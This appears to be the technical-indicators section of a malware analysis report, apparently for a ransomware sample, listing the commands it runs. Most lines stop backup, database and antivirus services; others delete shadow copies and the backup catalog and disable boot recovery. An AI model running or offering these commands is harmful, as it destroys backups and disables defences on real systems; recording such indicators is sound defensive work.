Technical Information
- Windows Defender
- '%WINDIR%\syswow64\net.exe' stop avpsus /y
- '%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper100 /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$KAV_CS_ADMIN_KIT /y
- '%WINDIR%\syswow64\net.exe' stop MySQL57 /y
- '%WINDIR%\syswow64\net.exe' stop FishbowlMySQL /y
- '%WINDIR%\syswow64\net.exe' stop SQLWriter /y
- '%WINDIR%\syswow64\net.exe' stop SQLAgent$VEEAMSQL2012 /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$VEEAMSQL2012 /y
- '%WINDIR%\syswow64\net.exe' stop ##WID /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$MICROSOFT /y
- '%WINDIR%\syswow64\net.exe' stop dbeng8 /y
- '%WINDIR%\syswow64\net.exe' stop dbsrv12 /y
- '%WINDIR%\syswow64\net.exe' stop vmware-converter /y
- '%WINDIR%\syswow64\net.exe' stop vmware /y
- '%WINDIR%\syswow64\net.exe' stop tomcat6 /y
- '%WINDIR%\syswow64\net.exe' stop msmdsrv /y
- '%WINDIR%\syswow64\net.exe' stop FCS /y
- '%WINDIR%\syswow64\net.exe' stop QuickBooks /y
- '%WINDIR%\syswow64\net.exe' stop QLADHLP /y
- '%WINDIR%\syswow64\net.exe' stop Intuit /y
- '%WINDIR%\syswow64\net.exe' stop SQLAgent$KAV_CS_ADMIN_KIT /y
- '%WINDIR%\syswow64\net.exe' stop msftesql /y
- '%WINDIR%\syswow64\net.exe' stop MVArmor /y
- '%WINDIR%\syswow64\net.exe' stop bedbg /y
- '%WINDIR%\syswow64\net.exe' stop backup /y
- '%WINDIR%\syswow64\net.exe' stop mepocs /y
- '%WINDIR%\syswow64\net.exe' stop memtas /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$ /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL /y
- '%WINDIR%\syswow64\net.exe' stop svc$ /y
- '%WINDIR%\syswow64\net.exe' stop vss /y
- '%WINDIR%\syswow64\net.exe' stop AcrSch2Svc /y
- '%WINDIR%\syswow64\net.exe' stop QBVSS /y
- '%WINDIR%\syswow64\net.exe' stop SQLAgent$SHAREPOINT /y
- '%WINDIR%\syswow64\net.exe' stop SQLAgent$SBSMONITORING /y
- '%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SBSMONITORING /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$SHAREPOINT /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$SBSMONITORING /y
- '%WINDIR%\syswow64\net.exe' stop MSSQL$MICROSOFT##SSEE /y
- '%WINDIR%\syswow64\net.exe' stop Exchange /y
- '%WINDIR%\syswow64\net.exe' stop sqlbrowser /y
- '%WINDIR%\syswow64\net.exe' stop Culserver /y
- '%WINDIR%\syswow64\net.exe' stop sqladhlp /y
- '%WINDIR%\syswow64\net.exe' stop stc_raw_agent /y
- '%WINDIR%\syswow64\net.exe' stop zhudongfangyu /y
- '%WINDIR%\syswow64\net.exe' stop YooBackup /y
- '%WINDIR%\syswow64\net.exe' stop YooIT /y
- '%WINDIR%\syswow64\net.exe' stop QBCFMonitorService /y
- '%WINDIR%\syswow64\net.exe' stop Intuit.QuickBooks.FCS /y
- '%WINDIR%\syswow64\net.exe' stop QBIDPService /y
- '%WINDIR%\syswow64\net.exe' stop QBFCService /y
- '%WINDIR%\syswow64\net.exe' stop RTVscan /y
- '%WINDIR%\syswow64\net.exe' stop ccSetMgr /y
- '%WINDIR%\syswow64\net.exe' stop ccEvtMgr /y
- '%WINDIR%\syswow64\net.exe' stop DefWatch /y
- '%WINDIR%\syswow64\net.exe' stop NetBackup BMR MTFTP Service /y
- '%WINDIR%\syswow64\net.exe' stop BMR Boot Service /y
- '%WINDIR%\syswow64\net.exe' stop mfewc /y
- '%WINDIR%\syswow64\net.exe' stop McAfeeDLPAgentService /y
- '%WINDIR%\syswow64\net.exe' stop VeeamTransportSvc /y
- '%WINDIR%\syswow64\net.exe' stop VeeamDeploymentService /y
- '%WINDIR%\syswow64\net.exe' stop VSNAPVSS /y
- '%WINDIR%\syswow64\net.exe' stop VeeamNFSSvc /y
- '%WINDIR%\syswow64\net.exe' stop sqlagent /y
- '%WINDIR%\syswow64\net.exe' stop veeam /y
- '%WINDIR%\syswow64\net.exe' stop Sqlservr /y
- '%WINDIR%\syswow64\net.exe' stop SavRoam /y
- '%WINDIR%\syswow64\net.exe' stop mysql57
- '%WINDIR%\syswow64\net.exe' stop -n apache24
- '%WINDIR%\syswow64\net.exe' stop sophos /y
- '%WINDIR%\syswow64\net.exe' stop CAARCUpdateSvc /y
- '%WINDIR%\syswow64\net.exe' stop CASAD2DWebSvc /y
- '%WINDIR%\syswow64\net.exe' stop sql /y
- '%WINDIR%\syswow64\net.exe' stop MVarmor64 /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecRPCService /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecManagementService /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecJobEngine /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecDiveciMediaService /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecAgentBrowser /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecAgentAccelerator /y
- '%WINDIR%\syswow64\net.exe' stop BackupExecVSSProvider /y
- '%WINDIR%\syswow64\net.exe' stop PDVFSService /y
- '%WINDIR%\syswow64\net.exe' stop AcronisAgent /y
- '%WINDIR%\syswow64\net.exe' stop ARSM /y
- firefox.exe
- %APPDATA%\microsoft\windows\templates\hrdb.ico
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C sc delete VSS
- '%WINDIR%\syswow64\net1.exe' stop sophos /y
- '%WINDIR%\syswow64\net1.exe' stop VeeamDeploymentService /y
- '%WINDIR%\syswow64\net1.exe' stop VeeamNFSSvc /y
- '%WINDIR%\syswow64\net1.exe' stop AcronisAgent /y
- '%WINDIR%\syswow64\net1.exe' stop VeeamTransportSvc /y
- '%WINDIR%\syswow64\net1.exe' stop -n apache24
- '%WINDIR%\syswow64\net1.exe' stop Culserver /y
- '%WINDIR%\syswow64\net1.exe' stop BackupExecRPCService /y
- '%WINDIR%\syswow64\net1.exe' wrapper
- '%WINDIR%\syswow64\net1.exe' stop AcrSch2Svc /y
- '%WINDIR%\syswow64\net1.exe' stop VSNAPVSS /y
- '%WINDIR%\syswow64\net1.exe' stop veeam /y
- '%WINDIR%\syswow64\net1.exe' stop BackupExecManagementService /y
- '%WINDIR%\syswow64\net1.exe' stop sqlbrowser /y
- '%WINDIR%\syswow64\net1.exe' stop CASAD2DWebSvc /y
- '%WINDIR%\syswow64\net1.exe' stop msftesql /y
- '%WINDIR%\syswow64\net1.exe' stop MSSQL$MICROSOFT /y
- '%WINDIR%\syswow64\net1.exe' stop FishbowlMySQL /y
- '%WINDIR%\syswow64\net1.exe' stop sqladhlp /y
- '%WINDIR%\syswow64\net1.exe' stop MSSQL$VEEAMSQL2012 /y
- '%WINDIR%\syswow64\net1.exe' stop Sqlservr /y
- '%WINDIR%\syswow64\net1.exe' stop BackupExecJobEngine /y
- '%WINDIR%\syswow64\net1.exe' stop BackupExecAgentBrowser /y
- '%WINDIR%\syswow64\net1.exe' stop zhudongfangyu /y
- '%WINDIR%\syswow64\net1.exe' stop BackupExecAgentAccelerator /y
- '%WINDIR%\syswow64\net1.exe' stop Intuit.QuickBooks.FCS /y
- '%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
- '%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
- '%WINDIR%\syswow64\net1.exe' stop McAfeeDLPAgentService /y
- '%WINDIR%\syswow64\net1.exe' stop BMR Boot Service /y
- '%WINDIR%\syswow64\net1.exe' stop avpsus /y
- '%WINDIR%\syswow64\net.exe' top SavRoam /y
- '%WINDIR%\syswow64\net1.exe' stop mfewc /y
- '%WINDIR%\syswow64\net1.exe' stop ccEvtMgr /y
- '%WINDIR%\syswow64\sc.exe' delete VSS
- '%WINDIR%\syswow64\net1.exe' stop NetBackup BMR MTFTP Service /y
- '%WINDIR%\syswow64\net1.exe' stop ccSetMgr /y
- '%WINDIR%\syswow64\net1.exe' stop QBIDPService /y
- '%WINDIR%\syswow64\net1.exe' stop DefWatch /y
- '%WINDIR%\syswow64\net1.exe' stop QBFCService /y
- '%WINDIR%\syswow64\net1.exe' stop QBCFMonitorService /y
- '%WINDIR%\syswow64\net.exe' wrapper
- '%WINDIR%\syswow64\net.exe' DefWatch
- '%WINDIR%\syswow64\net1.exe' stop YooBackup /y
- '%WINDIR%\syswow64\net1.exe' top SavRoam /y
- '%WINDIR%\syswow64\net1.exe' stop YooIT /y
- '%WINDIR%\syswow64\net1.exe' stop RTVscan /y
- '%WINDIR%\syswow64\net1.exe' stop mysql57
- '%WINDIR%\syswow64\net1.exe' stop BackupExecVSSProvider /y